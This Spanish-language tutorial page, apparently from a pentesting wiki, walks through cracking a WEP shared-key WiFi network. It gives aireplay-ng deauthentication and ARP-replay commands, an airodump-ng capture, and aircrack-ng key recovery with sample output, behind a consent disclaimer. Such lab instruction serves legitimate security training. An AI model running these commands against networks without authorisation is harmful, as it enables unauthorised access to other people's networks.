🌐Redes SKA
En esta sección vamos a hacer ataques a redes WiFi que tienen activada la opción de Share Key Autentication o "llave compartida".
Disclaimer: Vamos a realizar ataques a redes WiFi, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo
Configurar red SKA
En el panel de control del WiFi habilitar la opción "Llave compartida"
1. Partimos de un Deauth
🌐Deauthsudo aireplay-ng --deauth 1 -a 00:E0:4C:6A:5A:F8 -c 2A:2D:C8:0D:EB:F6 wlan0mon
2. Iniciar airodump-ng
Debemos guardar la salida con --write
# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write ska wlan0

Para este ataque es necesario que ya haya algún dispositivo vinculado a la red
Para el siguiente paso tendremos que utilizar la MAC de otro dispositivo en la red:

3. ARP Replay
sudo aireplay-ng --help
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
>> --arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
sudo aireplay-ng --arpreplay -b <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ>
sudo aireplay-ng --arpreplay -b 00:E0:AC:6A:5A:F8 -h 2A:2D:C8:0D:EB:F6 wlan0mon

Para aumentar la velocidad podemos apoyarnos de pequeños deauths:

Volviendo a airodump vemos que hemos aumentado correctamente el tráfico de red

4. Iniciar aircrack-ng
Abrir el archivo .cap
sudo aircrack-ng ska.cap

KEY FOUND! [12:34:56:78:90]
Password: 1234567890
Última actualización
¿Te fue útil?